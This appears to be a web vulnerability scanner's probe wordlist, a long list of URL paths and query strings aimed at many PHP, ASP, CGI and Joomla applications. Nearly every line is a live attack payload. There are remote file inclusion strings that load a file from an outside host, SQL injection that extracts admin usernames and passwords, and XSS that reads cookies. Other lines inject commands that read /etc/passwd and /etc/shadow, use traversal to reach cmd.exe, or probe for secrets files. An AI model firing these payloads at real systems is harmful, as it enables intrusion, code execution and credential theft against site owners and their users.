calendario/cal_insert.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
calendario/cal_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
calendario/cal_saveactivity.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
campas?%0acat%0a/etc/passwd%0a
caoc.php
career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/%201,md5(333),3,4%20--
cart.aspx?act=spikebuy&spikeid=3%20and%20str(123.4,8,4)%3E0
cart.php?lang_list=http://www.yxlink.com/nvs_test.txt
cart.pl?db='
cartWiz/store/addToCart.asp?idProduct='&quantity=1
cartWiz/store/error.asp?message='\x22><script>alert(1111)</script>
cart_content.php?cart_isp_root=http://www.yxlink.com/nvs_test.txt
cartwiz/store/access.asp?redirect='\x22><script>alert(1111)</script>
cartwiz/store/addToWishlist.asp?idProduct='\x22><script>alert(111111)</script>
cartwiz/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='\x22>/cartwiz/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='\x22><script>alert(11111)</script>
cartwiz/store/productCatalogSubCats.asp?idParentCategory='
cartwiz/store/productDetails.asp?idProduct='
cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom='&priceTo=9999999999&validate=1
cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=0&priceTo='&validate=1
cartwiz/store/searchResults.asp?name=&idCategory='&sku=&priceFrom=0&priceTo=9999999999&validate=1
cartwiz/store/searchResults.asp?name='\x22><script>alert(1111)</script>&idCategory=&sku=&priceFrom=0&priceTo=9999999999&validate=1
cartwiz/store/tellAFriend.asp?idProduct='\x22><script>alert(1111)</script>
catalog/includes/include_once.php?include_file=http://www.yxlink.com/nvs_test.txt
catalogg/inludes/include_once.php?include_file=http://www.yxlink.com/nvs_test.txt
catalogshop.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
categorie.php3?cid=june
catinfo.asp?cat='union%20select%20null,null,md5(333),null,null,null,null,null,pass,null,null,null,null,null%20FROM%20tblAdm%20where%20'1'='1
catinfo?<u><b>TESTING
cdsagenda/modification/SendAlertEmail.php?AGE=http://www.yxlink.com/nvs_test.txt?
celive/js/include.php?cmseasylive=1111&departmentid=0%27and%20%271%27=%271
celive/js/include.php?cmseasylive=1111&departmentid=0%27and%20%271%27=%272
centre.php?page=http://www.yxlink.com/nvs_test.txt
cerberusweb
certificate.php?host='\x22><script>alert(111)</script><\x22
certificate.php?host='\x22><script>alert(111)</script><\x22abxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaeada.php?a=<script>alert(32233333)</script>
certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
ceshi.php
cfagcms/themes/default/index.php?main=http://www.yxlink.com/nvs_test.txt
cfcache.map
cfdocs.map
cfdocs/cfcache.map
cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\x5Cboot.ini
cfdocs/exampleapp/email/getfile.cfm?filename=c:\x5Cboot.ini
cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\x5Cboot.ini
cfide/administrator/index.cfm
cgi-bin-sdb/printenv
cgi-bin/
cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert %28%27XSS%27%29%3B%3C/script%3E
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
cgi-bin/FormHandler.cgi
cgi-bin/FormMail.cgi
cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
cgi-bin/admin.cgi
cgi-bin/awstats/
cgi-bin/cgix/help?&page=web_list_block?\x22<script >alert(333)</script>
cgi-bin/eshop.pl?seite=;id|
cgi-bin/forms.exe?extension=foobar&command=Add+Extension
cgi-bin/guestbook.cgi
cgi-bin/handler/netsonar;cat /etc/passwd|?data=Download
cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html
cgi-bin/main_menu.pl
cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd``  \x5Cr\x5Cncat%20/etc/shadow`&port=80&e
cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd
cgi-bin/psinclude.cgi?template=|id%20-a;uptime|
cgi-bin/search
cgi-bin/search.cgi
cgi-bin/smallmenu.pl?url=%3C/title%3E%3Cscript%3Ealert(111)%3C/script%3E
cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id|
cgi-bin/test-cgi
cgi-bin/test.cgi
cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
cgi-bin/testing_whatever
cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD
cgi-bin/webcgi/about
cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.4/cgicso?query=AAA
cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.6/cgicso?query=AAA
cgi-mod/index.cgi
cgi-sys/FormMail-clone.cgi
cgi-sys/addalink.cgi
cgi-sys/defaultwebpage.cgi
cgi-sys/domainredirect.cgi
cgi-sys/entropybanner.cgi
cgi-sys/entropysearch.cgi
cgi-sys/guestbook.cgi?user=cpanel&template=|id
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\x5Cwindows\x5Cwin.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\x5Cwinnt\x5Cwin.ini
cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname=\x22<script>alert('XSS');</script>
cgicso?query=<script>alert('Vulnerable')</script>
cgicso?query=AAA
cgiwrap/%3Cfont%20color=red%3E
cgiwrap/~@USERS
cgiwrap/~JUNK(5)
cgiwrap/~root
ch_readalso.php?read_xml_include=http://www.yxlink.com/nvs_test.txt
challenge.php?vwar_root=http://www.yxlink.com/nvs_test.txt
challenge.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
change_preferences2.php?target=http://www.yxlink.com/nvs_test.txt
change_preferences2.php?target=http://www.yxlink.com/nvs_test.txt?
changelog.txt
changes.txt
chart.php?art=http://www.yxlink.com/nvs_test.txt
charts/amcolumn/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a+href=\x22javascript:alert(1)\x22>click</a>]]></message></chart>&.swf
chassis/config/GeneralChassisConfig.html
chat
chat.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
chat.php?my[root]=http://www.yxlink.com/nvs_test.txt?cm=id
chat.php?rg=0&test=\x22;phpinfo();exit;//
chat/adminips.php?banned_file=http://www.yxlink.com/nvs_test.txt
chat/register.php?register=yes&username=OverG&email=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>&email1=<script>alert%20(\x5C\x22Vulnerable\x5C\x22)</script>
chat/users_popupL.php3?From=http://www.yxlink.com/nvs_test.txt
checkout.php?abs_path=http://www.yxlink.com/nvs_test.txt
chimera/linkcategory.php?id=9999'%20union%20select%20md5(333)%20from%20admin/*
chkadmin/
chklogin/
ciamos_path/modules/forum/include/config.php?module_cache_path='http://www.yxlink.com/nvs_test.txt'
circ.php?include_path=http://www.yxlink.com/nvs_test.txt?
circolari/cir_save.php?CLASSPATH=http://www.yxlink.com/nvs_test.txt
citydesk.xml
citywriter/head.php?path=http://www.yxlink.com/nvs_test.txt?
ckeditor
cl_files/index.php?path_to_calendar=http://www.yxlink.com/nvs_test.txt?
claroline/auth/ldap/authldap.php?includePath=http://www.yxlink.com/nvs_test.txt
claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(222)%3C/script%3E
claroline/phpbb/page_tail.php?includePath=http://www.yxlink.com/nvs_test.txt
claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,0,md5(333),0,0,0%20from%20user%20where%20user_id=1--
claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20md5(333),0,0,0,0,0,0%20from%20user%20where%20user_id=1/*
claroline180rc1/claroline/inc/lib/import.lib.php?includePath=http://www.yxlink.com/nvs_test.txt?
class
class.mysql.php?path_to_bt_dir=http://www.yxlink.com/nvs_test.txt
class/Wiki/Wiki.php?c_node[class_path]=http://www.yxlink.com/nvs_test.txt
class/jpcache/jpcache.php?_PSL[classdir]=http://www.yxlink.com/nvs_test.txt?exec=uname
class/mysql.class
class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
class/phpthumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
classes
classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/Message.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=http://www.yxlink.com/nvs_test.txt
classes/Cache.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/Customer.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/Performance.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/Project.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/Representative.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/User.class.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/admin_o.php?absolutepath=http://www.yxlink.com/nvs_test.txt
classes/adodbt/sql.php?classes_dir=http://www.yxlink.com/nvs_test.txt
classes/board_o.php?absolutepath=http://www.yxlink.com/nvs_test.txt
classes/class_admin.php?PathToComment=http://www.yxlink.com/nvs_test.txt?
classes/class_comments.php?PathToComment=http://www.yxlink.com/nvs_test.txt?
classes/class_mail.inc.php?path_to_folder=http://www.yxlink.com/nvs_test.txt
classes/common.php?rootdir=http://www.yxlink.com/nvs_test.txt?
classes/core/language.php?rootdir=http://www.yxlink.com/nvs_test.txt
classes/dev_o.php?absolutepath=http://www.yxlink.com/nvs_test.txt
classes/file_o.php?absolutepath=http://www.yxlink.com/nvs_test.txt
classes/flowplayer/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
classes/html/com_articles.php?absolute_path=http://www.yxlink.com/nvs_test.txt
classes/main_class.php?default_path=http://www.yxlink.com/nvs_test.txt
classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://www.yxlink.com/nvs_test.txt
classes/query.class.php?baseDir=http://www.yxlink.com/nvs_test.txt
classes/tech_o.php?absolutepath=http://www.yxlink.com/nvs_test.txt
classified.php?insPath=http://www.yxlink.com/nvs_test.txt
classified_right.php?language_dir=http://www.yxlink.com/nvs_test.txt
classifieds/index.php?lowerTemplate=http://www.yxlink.com/nvs_test.txt
cleanup.log
clear.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
clearinfo.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\x5C\x22>< script>alert(1)/script><\x5C\x22
cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
click.php?dir=http://www.yxlink.com/nvs_test.txt?
client
client.php?dir=http://www.yxlink.com/nvs_test.txt
client/faq_1/PageController.php?dir=http://www.yxlink.com/nvs_test.txt
clients
clients.mdb
clients.sqlite
clients/index.php?src=http://www.yxlink.com/nvs_test.txt
clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\x22})))}catch(e){alert(document.domain);}//
cls_fast_template.php?fname=http://www.yxlink.com/nvs_test.txt
clusterframe.jsp?cluster=<script>alert(2222)</script>
clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
cm68news/engine/oldnews.inc.php?addpath=http://www.yxlink.com/nvs_test.txt?&
cmd
cmdasp.asp
cms
cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://www.yxlink.com/nvs_test.txt?
cms/meetweb/classes/ManagerResource.class.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/meetweb/classes/ManagerRightsResource.class.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/meetweb/classes/RegForm.class.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/meetweb/classes/RegResource.class.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/meetweb/classes/RegRightsResource.class.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/meetweb/classes/modules.php?root_path=http://www.yxlink.com/nvs_test.txt
cms/modules/form.lib.php?sourceFolder=http://www.yxlink.com/nvs_test.txt?
cms/plugins/content/jthumbs/includes/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
cms/system/openengine.php?oe_classpath=http://www.yxlink.com/nvs_test.txt???
cms/themes/cp_themes/default/images//swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
cms/themes/cp_themes/default/images//swfupload_f8.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
cms/themes/cp_themes/default/images//swfupload_f9.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
cms/voteManager/seeresult_bz.jsp?titleid=1%20and%201=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(100)||CHR(107)||CHR(111)||CHR(113)||(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(OWNER%20AS%20VARCHAR(4000)),CHR(32))%20FROM%20(SELECT%20OWNER,ROWNUM%20AS%20LIMIT%20FROM%20(SELECT%20DISTINCT(OWNER)%20FROM%20SYS.ALL_TABLES)%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT=1),CHR(32),CHR(113)||CHR(113)||CHR(113)),CHR(36),CHR(113)||CHR(112)||CHR(113)),CHR(64),CHR(113)||CHR(108)||CHR(113)))||CHR(113)||CHR(108)||CHR(101)||CHR(102)||CHR(113)||CHR(62)))%20FROM%20DUAL)&opid=1
cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://www.yxlink.com/nvs_test.txt?
cn_config.php?tpath=http://www.yxlink.com/nvs_test.txt?
coast/header.php?sections_file=http://www.yxlink.com/nvs_test.txt?
code/
code/berylium-classes.php?beryliumroot=http://www.yxlink.com/nvs_test.txt
code/display.php?admindir=http://www.yxlink.com/nvs_test.txt?
coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.yxlink.com/nvs_test.txt
com
com/
com5.java
com5.pl
com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt?
com_media_library/toolbar_ext.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
comment.php?ctype=1&conid=1%20UNION%20all%20SELECT%20md5(333)%20from%20mysql.user
comment.php?type=filemgmt&cid=filemgmt-1'70
comments.php?AMG_serverpath=http://www.yxlink.com/nvs_test.txt
comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x4E56535F544553545F474F,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+boka_members%23
comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,md5(8888),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+boka_members%23
comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x4E56535F544553545F474F,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+boka_members%23
comments.php?items_number=1'
comments.php?scriptpath=http://www.yxlink.com/nvs_test.txt?
comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
common
common.inc
common.inc.php?CFG[libdir]=http://www.yxlink.com/nvs_test.txt
common.inc.php?base_path=http://www.yxlink.com/nvs_test.txt
common.php?db_file=http://www.yxlink.com/nvs_test.txt
common.php?dir=http://www.yxlink.com/nvs_test.txt
common.php?ezt_root_path=http://www.yxlink.com/nvs_test.txt?
common.php?include_path=http://www.yxlink.com/nvs_test.txt
common.php?livealbum_dir=http://www.yxlink.com/nvs_test.txt
common.php?locale=http://www.yxlink.com/nvs_test.txt
common.php?phpht_real_path=http://www.yxlink.com/nvs_test.txt?
common/
common/codewidget.jsp?code=1%27
common/db.php?commonpath=http://www.yxlink.com/nvs_test.txt?
common/func.php?CommonAbsD=http://www.yxlink.com/nvs_test.txt?
common/func.php?CommonAbsDir=http://www.yxlink.com/nvs_test.txt
common/js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
common/phpthumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
common/scripts/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
community/Offline.php?sourcedir=http://www.yxlink.com/nvs_test.txt?
compass.rb
compat
component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.yxlink.com/nvs_test.txt
components/calendar/com_calendar.php?absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
components/com_alphacontent/assets/phpthumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
components/com_alphauserpoints/assets/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_articles.php?absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_breezingforms/libraries/jquery/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}//&.swf
components/com_calendar.php?absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yxlink.com/nvs_test.txt
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= http://www.yxlink.com/nvs_test.txt?
components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yxlink.com/nvs_test.txt
components/com_flexicontent/librairies/phpthumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
components/com_forum/download.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_guestbook.php?absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_hashcash/server.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_hotornot2/phpthumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_joomlaboard/file_upload.php?sbp=http://www.yxlink.com/nvs_test.txt?
components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_lm/archive.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_mambowiki/MamboLogin.php?IP=http://www.yxlink.com/nvs_test.txt?
components/com_minibb.php?absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_mospray/scripts/admin.php?basedir=http://www.yxlink.com/nvs_test.txt
components/com_mospray/scripts/admin.php?basedir=http://www.yxlink.com/nvs_test.txt?&cmd=id
components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
components/com_smf/smf.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
components/core/connect.php?language_path=http://www.yxlink.com/nvs_test.txt
components/minibb/bb_plugins.php?absolute_path=http://www.yxlink.com/nvs_test.txt?
components/minibb/index.php?absolute_path=http://www.yxlink.com/nvs_test.txt
components/xmlparser/loadparser.php?absoluteurl=http://www.yxlink.com/nvs_test.txt
composer.json
composer.lock
compteur/mapage.php?chemin=http://www.yxlink.com/nvs_test.txt
computers/default.asp?sort=&Direction='
conad/changeEmail.inc.php?mysqlCall=http://www.yxlink.com/nvs_test.txt
conad/changeUserDetails.inc.php?mysqlCall=http://www.yxlink.com/nvs_test.txt
conad/checkPasswd.inc.php?mysqlCall=http://www.yxlink.com/nvs_test.txt
conad/include/mysqlCall.inc.php?config=http://www.yxlink.com/nvs_test.txt
conad/include/rootGui.inc.php?header=http://www.yxlink.com/nvs_test.txt
conad/login.inc.php?mysqlCall=http://www.yxlink.com/nvs_test.txt
conad/logout.inc.php?mysqlCall=http://www.yxlink.com/nvs_test.txt
conf
conf.php?securelib=http://www.yxlink.com/nvs_test.txt
config
config.inc
config.inc.php3?rel_path=http://www.yxlink.com/nvs_test.txt
config.inc.php?_path=http://www.yxlink.com/nvs_test.txt
config.inc.php?path_escape=http://www.yxlink.com/nvs_test.txt
config.inc.php?path_escape=http://www.yxlink.com/nvs_test.txt%00
config.php
config.php?full_path=http://www.yxlink.com/nvs_test.txt?
config.php?full_path_to_db=http://www.yxlink.com/nvs_test.txt
config.php?fullpath=http://www.yxlink.com/nvs_test.txt
config.php?incpath=http://www.yxlink.com/nvs_test.txt
config.php?path_to_root=http://www.yxlink.com/nvs_test.txt
config.php?rel_path=http://www.yxlink.com/nvs_test.txt
config.php?rel_path=http://www.yxlink.com/nvs_test.txt?
config.php?rel_path=http://www.yxlink.com/nvs_test.txt? 
config.php?returnpath=http://www.yxlink.com/nvs_test.txt
config.php?sql_language=http://www.yxlink.com/nvs_test.txt?&cmd=0wn3d By Dr
config.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
config.rb
config.ru
config.xml
config/
config/aspcms_config.asp?sa=1
config/config_admin.php?INC=http://www.yxlink.com/nvs_test.txt?
config/config_main.php?INC=http://www.yxlink.com/nvs_test.txt?
config/config_member.php?INC=http://www.yxlink.com/nvs_test.txt?
config/database.yml
config/database.yml.pgsql
config/database.yml.sqlite3
config/database.yml_original
config/database.yml~
config/dbutil.bck.php?confdir=http://www.yxlink.com/nvs_test.txt
config/initializers/secret_token.rb
config/mysql_config.php?INC=http://www.yxlink.com/nvs_test.txt?
config/secrets.yml
config/sender.php?ROOT_PATH=http://www.yxlink.com/nvs_test.txt?
configprops
configuration.php
configuration.php?absolute_path=http://www.yxlink.com/nvs_test.txt?
configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert(222)>
configuration/configuration.jsf?');};alert(222);</script><!--
configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert(222)>&configName=server-config
confirmUnsubscription.php?output=http://www.yxlink.com/nvs_test.txt
connect.inc
connect.php?path=http://www.yxlink.com/nvs_test.txt
connexion.php?DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
console
console/a?=<script>alert(document.cookie)</script>
contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1
contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername=' ><script>alert('XSS Vulnerability')%3B</script>&Message=1
contact.php?blog_theme=http://www.yxlink.com/nvs_test.txt
contacts.php?cal_dir=http://www.yxlink.com/nvs_test.txt
contenido/external/frontend/news.php?cfg[path][includes]=http://www.yxlink.com/nvs_test.txt
content
content.php?content=http://www.yxlink.com/nvs_test.txt
content/admin.php?pwfile=http://www.yxlink.com/nvs_test.txt
content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
content/base/build/explorer/none.php?/etc/passwd
content/content.php?fileloc=http://www.yxlink.com/nvs_test.txt?
content/delete.php?pwfile=http://www.yxlink.com/nvs_test.txt
content/modify.php?pwfile=http://www.yxlink.com/nvs_test.txt
content/modify_go.php?pwfile=http://www.yxlink.com/nvs_test.txt
content/phpthumb/phpthumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
contents
